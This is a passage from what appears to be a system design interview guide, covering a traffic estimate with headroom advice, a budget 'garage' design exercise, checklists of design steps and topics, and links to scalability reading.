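Note that the exact per-day calculation gives a slightly lower QPS than the “100M/month ≈ 40 QPS” shortcut; either is fine at this level of precision. In a real interview, multiply the result by some headroom factor (2-3x) to handle traffic peaks and machine failures.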
https://gist.github.com/greenido/56495b7d4bec8eeb235caaec42cf007b
Pretend it’s you and your dog 🐕 working out of your garage, building this solution on weekends. How would you design this system on a budget? The goal is to establish the basic infrastructure that we will scale later.
1) Identify who is going to use it, how they are going to use it, and when they are going to use it
2) High level architecture design (Abstract design)
3) Component Design
4) Understanding Bottlenecks
5) Scaling your abstract design
6) Availability & Reliability
1) Concurrency
2) Networking
3) Abstraction
4) Real-World Performance
5) Estimation
6) Availability & Reliability
Links
How to rock a systems design interview
Introduction to Architecting Systems for Scale
Scalable System Design Patterns
Scalable Web Architecture and Distributed Systems
What is the best way to design a web site to be highly scalable?